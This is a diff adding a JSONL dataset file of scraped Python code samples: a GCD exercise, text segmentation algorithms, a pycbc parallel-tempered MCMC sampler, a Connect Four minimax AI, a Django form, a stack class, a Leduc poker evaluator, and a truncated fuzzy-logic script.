diff --git "a/4239.jsonl" "b/4239.jsonl" new file mode 100644--- /dev/null +++ "b/4239.jsonl" @@ -0,0 +1,1032 @@ +{"seq_id":"43727811358","text":"import sys\nsys.setrecursionlimit(10000)\n\ndef GCD(a,b): \n if(b==0): \n return a \n else: \n return GCD(b,a%b)\n\ndef GCD_TOTAL(args):\n total = 0\n while(1):\n if len(args) > 1:\n a = args[0]\n args.pop(0)\n for arg in args:\n total += GCD(a,arg)\n else:\n break\n print(total)\n\nif __name__ == \"__main__\":\n T = int(input())\n for i in range(T):\n GCD_TOTAL(list(map(int , input().split()))[1:])\n ","repo_name":"ggm1207/Algorithms","sub_path":"1.baekjoon/B (31 ~ 60)/S_9613_37%.py","file_name":"S_9613_37%.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40359382598","text":"\"\"\"\nCollect the various splitting strategies in one place\n\"\"\"\n\nimport numpy as np\nfrom scipy.ndimage import generic_filter\nfrom scipy.spatial.distance import cdist\nfrom numpy.random import rand\nimport tools\n\n\n####################\n# C99\n####################\n\ndef rankkern(x):\n \"\"\" The kernel for the rank transformation, measures the fraction of the neighbors that\n take on a value less than the middle value \"\"\"\n n = x.size\n mid = n//2\n better = ( (x >= 0) & (x=0).sum() - 1.0)\n\ndef rankify(mat, size=11):\n \"\"\" Apply the ranking transformation of a given size \"\"\"\n return generic_filter(mat, rankkern, size=(size,size), mode='constant', cval=-1)\n\ndef c99score(distsmat, hyp, minlength=1, maxlength=None):\n \"\"\" Do the choi c99 scoring for a hypothesis splitting \"\"\"\n N = distsmat.shape[0]\n beta = 0.0\n alpha = 0.0\n for (a,b) in tools.seg_iter(hyp):\n beta += distsmat[a:b,a:b].sum()\n alpha += (b-a)**2\n if minlength:\n if (b-a) < minlength: beta += -np.inf\n if maxlength:\n if (b-a) > maxlength: beta += -np.inf\n return -beta/(alpha+0.)\n\ndef c99split(distsmat, k, rank=0, *args, **kwargs):\n \"\"\" Do the Choi style c99 splitting, given a matrix of distances D,\n and k splits to perform. 
The rank keyword denotes whether we want to \n do the ranking transformation if positive and if so denotes the size of the\n ranking filter \"\"\"\n\n # perform ranking if desired\n if rank:\n distsmat = rankify(distsmat, rank)\n\n N = distsmat.shape[0]\n score = np.inf\n splits = [N]\n n = 0\n while n < k:\n newans = min( \n ( c99score( distsmat, sorted(splits+[i]), *args, **kwargs ), splits+[i] ) \n for i in xrange(1,N-1) if i not in set(splits) )\n n += 1\n splits = newans[1]\n score = newans[0]\n return sorted(splits), score\n\n \n####################\n# DP\n####################\n\n# The dynamic programming splitter\n\ndef gensig_euclidean(X,minlength=1,maxlength=None):\n \"\"\" Generate the sigma for the squared difference from the mean \"\"\"\n cs = X.cumsum(0)\n css = (X**2).sum(1).cumsum(0) \n def sigma(i,j): \n length = j-i\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n if i == 0:\n return css[j-1] - 1./j * ((cs[j-1])**2).sum() \n else: \n return ( css[j-1]-css[i-1] ) - 1./(j-i) * ((cs[j-1] - cs[i-1])**2).sum() \n return sigma\n\n\ndef gensig_cosine(X, minlength=1, maxlength=None):\n \"\"\" Generate the sigma for the cosine similarity \"\"\"\n def sigma(a,b):\n length = (b-a)\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n rep = X[a:b].mean(0)\n if length < 2:\n return np.inf\n return (cdist( X[a:b], [ rep ], 'cosine')**2).sum()\n return sigma\n\n\ndef gensig_model_old(X, minlength=1, maxlength=None, lam=0.0):\n N,D = X.shape\n over_sqrtD = 1./np.sqrt(D)\n def sigma(a,b):\n length = (b-a)\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n rep = (2*(X[a:b].sum(0)>0)-1)*over_sqrtD\n return -X[a:b].dot(rep).sum() \n # return -X[a:b].dot(rep).sum() + lam*np.sqrt(length)/np.log(N)\n return sigma\n\ndef gensig_model(X, minlength=1, maxlength=None, lam=0.0):\n N,D = X.shape\n over_sqrtD = 1./np.sqrt(D)\n cs = np.cumsum(X,0)\n\n def sigma(a,b):\n length = (b-a)\n if minlength:\n if length < minlength: return np.inf\n if maxlength:\n if length > maxlength: return np.inf\n\n tot = cs[b-1].copy()\n if a > 0:\n tot -= cs[a-1]\n signs = np.sign(tot)\n return -over_sqrtD*(signs*tot).sum()\n return sigma\n\n\ndef tiebreak():\n return 1e-10*rand()\n\ndef gensig_choi(distsmat, minlength=1, maxlength=None, rank=0):\n \"\"\" The two dimensional sigma function for the c99 splitting \"\"\"\n if rank:\n distsmat = rankify(distsmat, rank)\n def sigma(a,b):\n length = (b-a)\n beta = distsmat[a:b,a:b].sum()\n alpha = (b-a)**2\n if minlength:\n if (b-a) < minlength: beta += np.inf\n if maxlength:\n if (b-a) > maxlength: beta += np.inf\n return (-beta, alpha)\n return sigma\n\ndef dpsplit(n,k, sig):\n \"\"\" Perform the dynamic programming optimal segmentation, using the sig function\n to determine the cost of a segment sig(i,j) is the cost of the i,j segment. 
These\n are then added together\n \"\"\"\n\n # Set up the tracking tables\n K = k + 1\n N = n\n segtable = np.zeros((n,K)) + np.nan\n segtable[:,0] = [ sig(0,j+1) for j in xrange(N) ]\n segindtable = np.zeros((N,K), dtype='int') - 1\n\n # fill up the table in a clever order\n for k in xrange(1,K):\n for j in xrange(k,N):\n #fill the j,k element\n ans = min( ( (segtable[l,k-1] + sig(l+1,j+1), l+1 )\n for l in xrange(k-1,j) ) )\n segtable[j,k] = ans[0]\n segindtable[j,k] = ans[1]\n\n # read out the path\n current_pointer = segindtable[-1,K-1]\n path = [current_pointer]\n for k in xrange(K-2, 0, -1):\n current_pointer = segindtable[current_pointer-1, k]\n path.append(current_pointer)\n\n return sorted(path + [N]), segtable[-1,K-1]\n\ndef dpsplit_general(n,k, sig, combine=lambda a,b: a+b, key=lambda a: a, d=1):\n \"\"\" Perform the dynamic programming optimal segmentation, using the sig function\n to determine the cost of a segment sig(i,j) is the cost of the i,j segment. These\n are then added together using the combine function and reduced to a scalar cost with the \n key function. d sets the dimensionality of the intermediary representation\n \"\"\"\n\n # Set up the tracking tables\n K = k + 1\n N = n\n if d > 1:\n segtable = np.zeros((n,K,d)) + np.nan\n else:\n segtable = np.zeros((n,K)) + np.nan\n segtable[:,0] = [ sig(0,j+1) for j in xrange(N) ]\n segindtable = np.zeros((N,K), dtype='int') - 1\n\n # fill up the table in a clever order\n for k in xrange(1,K):\n for j in xrange(k,N):\n #fill the j,k element\n ans = min( ( ( combine(segtable[l,k-1],sig(l+1,j+1)), l+1 )\n for l in xrange(k-1,j) ), key=lambda x: key(x[0]) )\n segtable[j,k] = ans[0]\n segindtable[j,k] = ans[1]\n\n # read out the path\n current_pointer = segindtable[-1,K-1]\n path = [current_pointer]\n for k in xrange(K-2, 0, -1):\n current_pointer = segindtable[current_pointer-1, k]\n path.append(current_pointer)\n\n return sorted(path + [N]), key(segtable[-1,K-1])\n\n\n####################\n# Greedy\n####################\n\n\ndef greedysplit(n, k, sigma):\n \"\"\" Do a greedy split \"\"\"\n splits = [n]\n s = sigma(0,n)\n\n def score(splits, sigma):\n splits = sorted(splits)\n return sum( sigma(a,b) for (a,b) in tools.seg_iter(splits) )\n\n while k > 0:\n usedinds = set(splits)\n new = min( ( score( splits + [i], sigma), splits + [i] )\n for i in xrange(1,n) if i not in usedinds )\n splits = new[1]\n s = new[0]\n k -= 1\n return sorted(splits), s\n\ndef greedysplit_general(n, k, sigma, combine=lambda a,b: a+b, key=lambda a: a):\n \"\"\" Do a greedy split \"\"\"\n splits = [n]\n s = sigma(0,n)\n\n def score(splits, sigma):\n splits = sorted(splits)\n return key( reduce( combine, (sigma(a,b) for (a,b) in tools.seg_iter(splits) ) ))\n\n while k > 0:\n usedinds = set(splits)\n new = min( ( score( splits + [i], sigma), splits + [i] )\n for i in xrange(1,n) if i not in usedinds )\n splits = new[1]\n s = new[0]\n k -= 1\n return sorted(splits), s\n\ndef bestsplit(low, high, sigma, minlength=1, maxlength=None):\n \"\"\" Find the best split inside of a region \"\"\"\n length = high-low\n if length < 2*minlength:\n return (np.inf, np.inf, low)\n best = min( ((sigma(low,j), sigma(j, high), j) for j in xrange(low+1,high)), key=lambda x: x[0]+x[1] )\n return best\n\n\ndef greedysplit_old(n, k, sigma):\n \"\"\" Do a greedy split \"\"\"\n k = k + 1\n splits = [0,n]\n costs = [sigma(0,n)]\n cost = costs[0]\n # path = []\n\n while k > 0:\n bestcosts = []\n bsp = []\n bestcost = np.inf\n for j in xrange(len(splits)-1):\n left, right, sp = 
bestsplit(splits[j], splits[j+1], sigma)\n newcost = left+right + sum(costs[:j]) + sum(costs[j+1:])\n if newcost < bestcost:\n bestcost = newcost\n bsp = splits[:j+1] + [sp] + splits[j+1:]\n bestcosts = costs[:j] + [left,right] + costs[j:]\n costs = bestcosts\n cost = bestcost\n splits = bsp\n # path.append( (splits, cost, k*(d+1)*np.log(d*top) ) )\n k -= 1\n\n return splits[1:], cost\n\n\ndef refine(splits, sigma, n=1):\n \"\"\" Given some splits, refine them a step \"\"\"\n oldsplits = splits[:]\n counter = 0\n n = n or np.inf\n\n while counter < n:\n splits = [0]+splits\n n = len(splits) - 2\n new = [splits[0]]\n for i in xrange(n):\n out = bestsplit(splits[i], splits[i+2], sigma)\n new.append(out[2])\n new.append(splits[-1])\n splits = new[1:]\n\n if splits == oldsplits:\n break\n oldsplits = splits[:]\n counter += 1\n\n return splits\n\ndef bestsplit_general(splits, pk, sigma, combine=lambda a,b: a+b, key=lambda a: a):\n \"\"\" Move the pk-th split to its best location \"\"\"\n def score(splits, sigma):\n splits = sorted(splits)\n return key( reduce( combine, (sigma(a,b) for (a,b) in tools.seg_iter(splits) ) ))\n\n if pk == 0:\n left = 0\n else:\n left = splits[pk-1]\n right = splits[pk+1]\n\n best = min( (score( splits[:pk] + [j] + splits[pk+1:], sigma),j) for j in xrange(left+1,right) )\n return best[1]\n\ndef refine_general(splits, sigma, n=1, combine=lambda a,b: a+b, key=lambda a: a):\n \"\"\" Do a general refinement of up to n steps \"\"\"\n oldsplits = splits[:]\n N = splits[-1]\n counter = 0\n k = len(splits)\n n = n or np.inf\n\n while counter < n:\n splits = [ bestsplit_general(splits, i, sigma, combine, key) for i in xrange(k-1) ] + [N]\n\n if splits == oldsplits:\n break\n oldsplits = splits[:]\n counter += 1\n\n return splits\n\n","repo_name":"alexalemi/segmentation","sub_path":"code/splitters.py","file_name":"splitters.py","file_ext":"py","file_size_in_byte":10643,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"95"} +{"seq_id":"20644402118","text":"from __future__ import absolute_import\n\nimport numpy\nimport emcee\nimport h5py\nimport logging\nfrom pycbc.pool import choose_pool\n\nfrom .base import BaseSampler\nfrom .base_mcmc import (BaseMCMC, raw_samples_to_dict,\n get_optional_arg_from_config)\nfrom .base_multitemper import (MultiTemperedSupport,\n MultiTemperedAutocorrSupport)\nfrom ..burn_in import MultiTemperedMCMCBurnInTests\nfrom pycbc.inference.io import EmceePTFile\nfrom .. import models\n\n\nclass EmceePTSampler(MultiTemperedAutocorrSupport, MultiTemperedSupport,\n BaseMCMC, BaseSampler):\n \"\"\"This class is used to construct a parallel-tempered MCMC sampler from\n the emcee package's PTSampler.\n\n Parameters\n ----------\n model : model\n A model from ``pycbc.inference.models``.\n ntemps : int\n Number of temeratures to use in the sampler.\n nwalkers : int\n Number of walkers to use in sampler.\n betas : array\n An array of inverse temperature values to be used in emcee_pt's\n temperature ladder. 
If not provided, emcee_pt will use the number of\n temperatures and the number of dimensions of the parameter space to\n construct the ladder with geometrically spaced temperatures.\n pool : function with map, Optional\n A provider of a map function that allows a function call to be run\n over multiple sets of arguments and possibly maps them to\n cores/nodes/etc.\n \"\"\"\n name = \"emcee_pt\"\n _io = EmceePTFile\n burn_in_class = MultiTemperedMCMCBurnInTests\n\n def __init__(self, model, ntemps, nwalkers, betas=None,\n checkpoint_interval=None, checkpoint_signal=None,\n loglikelihood_function=None,\n nprocesses=1, use_mpi=False):\n\n self.model = model\n\n # create a wrapper for calling the model\n if loglikelihood_function is None:\n loglikelihood_function = 'loglikelihood'\n # frustratingly, emcee_pt does not support blob data, so we have to\n # turn it off\n model_call = models.CallModel(model, loglikelihood_function,\n return_all_stats=False)\n\n # Set up the pool\n if nprocesses > 1:\n # these are used to help paralleize over multiple cores / MPI\n models._global_instance = model_call\n model_call = models._call_global_model\n prior_call = models._call_global_model_logprior\n else:\n prior_call = models.CallModel(model, 'logprior',\n return_all_stats=False)\n pool = choose_pool(mpi=use_mpi, processes=nprocesses)\n if pool is not None:\n pool.count = nprocesses\n\n # construct the sampler: PTSampler needs the likelihood and prior\n # functions separately\n ndim = len(model.variable_params)\n self._sampler = emcee.PTSampler(ntemps, nwalkers, ndim,\n model_call, prior_call, pool=pool,\n betas=betas)\n self._nwalkers = nwalkers\n self._ntemps = ntemps\n self._checkpoint_interval = checkpoint_interval\n self._checkpoint_signal = checkpoint_signal\n\n @property\n def io(self):\n return self._io\n\n @property\n def base_shape(self):\n return (self.ntemps, self.nwalkers,)\n\n @property\n def betas(self):\n return self._sampler.betas\n\n @classmethod\n def from_config(cls, cp, model, nprocesses=1, use_mpi=False):\n \"\"\"\n Loads the sampler from the given config file.\n\n For generating the temperature ladder to be used by emcee_pt, either\n the number of temperatures (provided by the option 'ntemps'),\n or the path to a file storing inverse temperature values (provided\n under a subsection inverse-temperatures-file) can be loaded from the\n config file. If the latter, the file should be of hdf format, having\n an attribute named 'betas' storing the list of inverse temperature\n values to be provided to emcee_pt. 
If the former, emcee_pt will\n construct the ladder with \"ntemps\" geometrically spaced temperatures.\n \"\"\"\n section = \"sampler\"\n # check name\n assert cp.get(section, \"name\") == cls.name, (\n \"name in section [sampler] must match mine\")\n # get the number of walkers to use\n nwalkers = int(cp.get(section, \"nwalkers\"))\n if cp.has_option(section, \"ntemps\") and \\\n cp.has_option(section, \"inverse-temperatures-file\"):\n raise ValueError(\"Must specify either ntemps or \"\n \"inverse-temperatures-file, not both.\")\n if cp.has_option(section, \"inverse-temperatures-file\"):\n # get the path of the file containing inverse temperatures values.\n inverse_temperatures_file = cp.get(section,\n \"inverse-temperatures-file\")\n with h5py.File(inverse_temperatures_file, \"r\") as fp:\n try:\n betas = numpy.array(fp.attrs['betas'])\n ntemps = betas.shape[0]\n except KeyError:\n raise AttributeError(\"No attribute called betas\")\n else:\n # get the number of temperatures\n betas = None\n ntemps = int(cp.get(section, \"ntemps\"))\n # get the checkpoint interval, if it's specified\n checkpoint_interval = cls.checkpoint_from_config(cp, section)\n checkpoint_signal = cls.ckpt_signal_from_config(cp, section)\n # get the loglikelihood function\n logl = get_optional_arg_from_config(cp, section, 'logl-function')\n obj = cls(model, ntemps, nwalkers, betas=betas,\n checkpoint_interval=checkpoint_interval,\n checkpoint_signal=checkpoint_signal,\n loglikelihood_function=logl, nprocesses=nprocesses,\n use_mpi=use_mpi)\n # set target\n obj.set_target_from_config(cp, section)\n # add burn-in if it's specified\n obj.set_burn_in_from_config(cp)\n # set prethin options\n obj.set_thin_interval_from_config(cp, section)\n return obj\n\n @property\n def samples(self):\n \"\"\"A dict mapping ``variable_params`` to arrays of samples currently\n in memory.\n\n The arrays have shape ``ntemps x nwalkers x niterations``.\n \"\"\"\n # emcee stores samples to it's chain attribute as a\n # nwalker x niterations x ndim array\n raw_samples = self._sampler.chain\n return raw_samples_to_dict(self, raw_samples)\n\n @property\n def model_stats(self):\n \"\"\"Returns the log likelihood ratio and log prior as a dict of arrays.\n\n The returned array has shape ntemps x nwalkers x niterations.\n\n Unfortunately, because ``emcee_pt`` does not have blob support, this\n will only return the loglikelihood and logprior (with the logjacobian\n set to zero) regardless of what stats the model can return.\n\n\n .. warning::\n Since the `logjacobian` is not saved by `emcee_pt`, the `logprior`\n returned here is the log of the prior pdf in the sampling\n coordinate frame rather than the variable params frame. This\n differs from the variable params frame by the log of the Jacobian\n of the transform from one frame to the other. 
If no sampling\n transforms were used, then the `logprior` is the same.\n \"\"\"\n # likelihood has shape ntemps x nwalkers x niterations\n logl = self._sampler.lnlikelihood\n # get prior from posterior\n logp = self._sampler.lnprobability - logl\n logjacobian = numpy.zeros(logp.shape)\n return {'loglikelihood': logl, 'logprior': logp,\n 'logjacobian': logjacobian}\n\n def clear_samples(self):\n \"\"\"Clears the chain and blobs from memory.\n \"\"\"\n # store the iteration that the clear is occuring on\n self._lastclear = self.niterations\n self._itercounter = 0\n # now clear the chain\n self._sampler.reset()\n\n def set_state_from_file(self, filename):\n \"\"\"Sets the state of the sampler back to the instance saved in a file.\n \"\"\"\n with self.io(filename, 'r') as fp:\n rstate = fp.read_random_state()\n # set the numpy random state\n numpy.random.set_state(rstate)\n\n def run_mcmc(self, niterations):\n \"\"\"Advance the ensemble for a number of samples.\n\n Parameters\n ----------\n niterations : int\n Number of samples to get from sampler.\n \"\"\"\n pos = self._pos\n if pos is None:\n pos = self._p0\n res = self._sampler.run_mcmc(pos, niterations)\n p, _, _ = res[0], res[1], res[2]\n # update the positions\n self._pos = p\n\n def write_results(self, filename):\n \"\"\"Writes samples, model stats, acceptance fraction, and random state\n to the given file.\n\n Parameters\n -----------\n filename : str\n The file to write to. The file is opened using the ``io`` class\n in an an append state.\n \"\"\"\n with self.io(filename, 'a') as fp:\n # write samples\n fp.write_samples(self.samples, self.model.variable_params,\n last_iteration=self.niterations)\n # write stats\n fp.write_samples(self.model_stats, last_iteration=self.niterations)\n # write accpetance\n fp.write_acceptance_fraction(self._sampler.acceptance_fraction)\n # write random state\n fp.write_random_state()\n\n @classmethod\n def calculate_logevidence(cls, filename, thin_start=None, thin_end=None,\n thin_interval=None):\n \"\"\"Calculates the log evidence from the given file using ``emcee_pt``'s\n thermodynamic integration.\n\n Parameters\n ----------\n filename : str\n Name of the file to read the samples from. Should be an\n ``EmceePTFile``.\n thin_start : int\n Index of the sample to begin returning stats. Default is to read\n stats after burn in. To start from the beginning set thin_start\n to 0.\n thin_interval : int\n Interval to accept every i-th sample. Default is to use the\n `fp.acl`. If `fp.acl` is not set, then use all stats\n (set thin_interval to 1).\n thin_end : int\n Index of the last sample to read. 
If not given then\n `fp.niterations` is used.\n\n Returns\n -------\n lnZ : float\n The estimate of log of the evidence.\n dlnZ : float\n The error on the estimate.\n \"\"\"\n with cls._io(filename, 'r') as fp:\n logls = fp.read_raw_samples(['loglikelihood'],\n thin_start=thin_start,\n thin_interval=thin_interval,\n thin_end=thin_end,\n temps='all', flatten=False)\n logls = logls['loglikelihood']\n # we need the betas that were used\n betas = fp.betas\n # annoyingly, theromdynaimc integration in PTSampler is an instance\n # method, so we'll implement a dummy one\n ntemps = fp.ntemps\n nwalkers = fp.nwalkers\n ndim = len(fp.variable_params)\n dummy_sampler = emcee.PTSampler(ntemps, nwalkers, ndim, None,\n None, betas=betas)\n return dummy_sampler.thermodynamic_integration_log_evidence(\n logls=logls, fburnin=0.)\n\n def finalize(self):\n \"\"\"Calculates the log evidence and writes to the checkpoint file.\n\n The thin start/interval/end for calculating the log evidence are\n retrieved from the checkpoint file's thinning attributes.\n \"\"\"\n logging.info(\"Calculating log evidence\")\n # get the thinning settings\n with self.io(self.checkpoint_file, 'r') as fp:\n thin_start = fp.thin_start\n thin_interval = fp.thin_interval\n thin_end = fp.thin_end\n # calculate\n logz, dlogz = self.calculate_logevidence(\n self.checkpoint_file, thin_start=thin_start, thin_end=thin_end,\n thin_interval=thin_interval)\n logging.info(\"log Z, dlog Z: {}, {}\".format(logz, dlogz))\n # write to both the checkpoint and backup\n for fn in [self.checkpoint_file, self.backup_file]:\n with self.io(fn, \"a\") as fp:\n fp.write_logevidence(logz, dlogz)\n","repo_name":"Yuzhe98/Yu0702","sub_path":"venv/Lib/site-packages/pycbc-master/pycbc/inference/sampler/emcee_pt.py","file_name":"emcee_pt.py","file_ext":"py","file_size_in_byte":12830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27749969861","text":"import copy\nfrom board import Board\n\nclass AI:\n def minimax(self, board, depth, bestVal, minVal, isMaxiPlayer):\n val = 0\n r = 0\n column = 0\n validLocations = board.getValidLocations()\n is_gameTerminal = board.gameFinished()\n if depth == 0 or is_gameTerminal:\n if is_gameTerminal:\n if board.ai_check_win():\n if board.turn is board.turn:\n return (None, 1000)\n elif board.turn is not board.turn:\n return (None, -1000)\n else:\n return (None, 0)\n else:\n return (None, board.score_position(board))\n # print(validLocations)\n if isMaxiPlayer:\n # print(\"Entering Maxi Player Loop\")\n highestVal = -1000\n # print(\"7th Col State: \" + str(board.grid[0][6].state))\n for col in validLocations:\n r = board.obtainNextAvailRow(col)\n selfCopy = copy.copy(board)\n # print(\"Col: \" + str(col))\n selfCopy.grid[r][col].state = board.turn\n value = self.minimax(selfCopy, (depth - 1), bestVal, minVal, False)[1]\n\n board.grid[r][col].state = \"black\"\n if value > highestVal:\n highestVal = value\n column = col\n # print(\"highestVal: \" + str(highestVal))\n # print(\"col: \" + str(col))\n bestVal = max(bestVal, highestVal)\n if bestVal >= minVal:\n break\n # print(\"Minimax Column: \" + str(column))\n return column, highestVal\n\n\n else:\n\n print(\"Entering Mini Player Lopp\")\n highestVal = 1000\n # for i in range(7):\n # print(\"Available Spot: [\" + str(minValueRow[i]) + \",\" + str(minValueCol[i]) + \"]\")\n\n for col in validLocations:\n r = board.obtainNextAvailRow(col)\n selfCopy = copy.copy(board)\n selfCopy.grid[r][col].state = board.turn\n # 
print(\"Turn: \" + str(board.turn))\n value = self.minimax(selfCopy, (depth - 1), bestVal, minVal, True)[1]\n if value < highestVal:\n highestVal = value\n column = col\n minVal = min(highestVal, minVal)\n if bestVal >= minVal:\n break\n board.grid[r][col].state = \"black\"\n return column, highestVal","repo_name":"nathrichCSUF/Connect4AI","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"24216154526","text":"from django.forms import ModelForm,HiddenInput\n\nfrom .models import Command\n\nclass DefineCommandForm(ModelForm):\n class Meta:\n model = Command\n fields = '__all__'\n exclude = ['owner']\n widgets = {\n 'owner':HiddenInput(),\n 'cmd_date':HiddenInput(),\n 'is_published':HiddenInput(),\n }","repo_name":"GoldenbyteTeam/GB_PROJECT","sub_path":"clicommands/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40166038854","text":"\nclass Stack:\n def __init__(self):\n self.stack = []\n \n def push(self, item):\n self.stack.append(item)\n \n def pop(self):\n if not self.is_empty():\n return self.stack.pop()\n else:\n return \"Stack is empty\"\n \n def top(self):\n if not self.is_empty():\n return self.stack[-1]\n else:\n return \"Stack is empty\"\n \n def is_empty(self):\n return len(self.stack) == 0\n \n def display(self):\n if not self.is_empty():\n print(\"Stack:\", self.stack)\n else:\n print(\"Stack is empty\")\n\n# Creating a stack and filling it with user-defined elements\nstack = Stack()\n\nprint(\"Step 1: Create and fill the stack with user-defined elements\")\n\nfor i in range(6):\n element = input(f\"Enter element {i+1}: \")\n stack.push(element)\n\n# Displaying the stack\nstack.display()\n\n# Removing first 3 elements from the stack using pop\nprint(\"\\nRemoving first 3 elements from the stack\")\nfor _ in range(3):\n stack.pop()\n\n# Displaying the edited stack\nstack.display()\n\n# Checking the element at the top of the stack using top method\nprint(\"\\nElement at the top of the stack:\", stack.top())\n\n# Checking if the stack is empty using is_empty method\nprint(\"Is the stack empty?\", stack.is_empty())\n\n# Removing all elements from the stack using a while loop\nprint(\"\\nRemoving all elements from the stack:\")\nwhile not stack.is_empty():\n print(\"Element at the top of the stack:\", stack.top())\n stack.pop()\n\n# Repeating Step 1: Create and fill the stack with user-defined elements\nprint(\"\\nRepeating Step 1: Create and fill the stack with user-defined elements\")\nfor i in range(6):\n element = input(f\"Enter element {i+1}: \")\n stack.push(element)\n\n# Displaying the stack after repeating Step 1\nstack.display()\n\n","repo_name":"syedanasali09/DSA-with-Python","sub_path":"Lab-OHT/Question-3.py","file_name":"Question-3.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11659067822","text":"import numpy as np\n\nfrom card_tools import card_tools\nfrom GameSettings import game_settings\n\n\n# Gives strength representations for all private hands on the given board.\n# @param board a possibly empty vector of board cards\n# @param impossible_hand_value the value to assign to hands which are invalid\n# on the board\n# @return a vector containing a strength value or `impossible_hand_value` 
for\n# every private hand\ndef batch_eval(board, impossible_hand_value):\n hand_values = np.full(game_settings.card_count, -1, dtype=float)\n\n if board.shape[0] == 0:\n for hand in range(1, game_settings.card_count + 1):\n hand_values[hand - 1] = int((hand - 1) / game_settings.suit_count) + 1\n else:\n board_size = board.shape[0]\n assert board_size == 1 or board_size == 2, \"Incorrect board size for Leduc\"\n whole_hand = np.zeros(board_size + 1, dtype=int)\n whole_hand[:-1] = board\n\n for card in range(1, game_settings.card_count + 1):\n whole_hand[-1] = card\n hand_values[card - 1] = evaluate(whole_hand, impossible_hand_value)\n\n return hand_values\n\n\n# Gives a strength representation for a two or three card hand.\n# @param hand a vector of two or three cards\n# @param[opt] impossible_hand_value the value to return if the hand is invalid\n# @return the strength value of the hand, or `impossible_hand_value` if the\n# hand is invalid\ndef evaluate(whole_hand, impossible_hand_value=None):\n assert (\n np.max(whole_hand) <= game_settings[\"card_count\"] and np.min(whole_hand) > 0\n ), \"hand does not correspond to any cards\"\n impossible_hand_value = (\n impossible_hand_value if impossible_hand_value is not None else -1\n )\n\n if not card_tools.hand_is_possible(whole_hand):\n return impossible_hand_value\n\n # We are not interested in the hand suit; we will use ranks instead of cards\n hand_ranks = np.copy(whole_hand)\n for i in range(hand_ranks.size):\n hand_ranks[i] = card_to_string.card_to_rank(hand_ranks[i])\n\n hand_ranks.sort()\n\n if whole_hand.size == 2:\n return evaluate_two_card_hand(hand_ranks)\n elif whole_hand.size == 3:\n return evaluate_three_card_hand(hand_ranks)\n else:\n assert False, \"unsupported size of hand!\"\n","repo_name":"haochenuw/pydeepstack","sub_path":"Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2411566105","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\nclass fuzzy():\r\n\tXmin=2100 #permintaan minimal\r\n\tXmax=3500 #permintaan maxsimal\r\n\tYmin=100 #persediaan minimal\r\n\tYmax=250\r\n\tZmin=1000\r\n\tZmax=5000\r\n\tpermNaik=0\r\n\tpremTurun=0\r\n\tpsdSedikit=0\r\n\tpsdBanyak=0\r\n\tx=0 #permintaan\r\n\ty=0 #persediaan\r\n\talpa=[0]*4\r\n\tz=[0]*4\r\n\r\ndef __init__(self,permintaan,persediaan):\r\n\tself.x=permintaan\r\n\tself.y=persediaan\r\n\tself.fpermTurun()\r\n\tself.fpermNaik()\r\n\tself.psdSedikit()\r\n\tself.psdBanyak()\r\n\tself.rule()\r\n#self.defuzifikasi()\r\n\r\ndef fpermTurun(self):\r\n\tif self.x < self.Xmin:\r\n\t\tself.permTurun=1\r\n\telif self.x>=self.Xmin and self.x<=self.Xmax:\r\n\t\tself.permTurun=(self.Xmax-self.x)/(self.Xmax-self.Xmin)\r\n\telse:\r\n\t\tself.permTurun=0\r\n\r\ndef fpermNaik(self):\r\n\tif self.x < self.Xmin:\r\n\t\tself.permNaik=0\r\n\telif self.x>=self.Xmin and self.x<=self.Xmax:\r\n\t\tself.permNaik=(self.x-self.Xmin)/(self.Xmax-self.Xmin)\r\n\telse:\r\n\t\tself.permNaik=1\r\n\r\ndef fpsdSedikit(self):\r\n\tif self.y<self.Ymin:\r\n\t\tself.psdSedikit=1\r\n\telif self.y>=self.Ymin and self.y<=self.Ymax:\r\n\t\tself.psdSedikit=(self.Ymax-self.y)/(self.Ymax-self.Ymin)\r\n\telse:\r\n\t\tself.psdSedikit=0\r\n\r\ndef fpsdBanyak(self):\r\n\tif self.y<self.Ymin:\r\n\t\tself.psdBanyak=0\r\n\telif self.y>=self.Ymin and self.y<=self.Ymax:\r\n\t\tself.psdBanyak=(self.y-self.Ymin)/(self.Ymax-self.Ymin)\r\n\telse:\r\n\t\tself.psdBanyak=1\r\n\r\ndef rule(self):\r\n\t#rule 1: jika perm turun dan psd banyak maka 
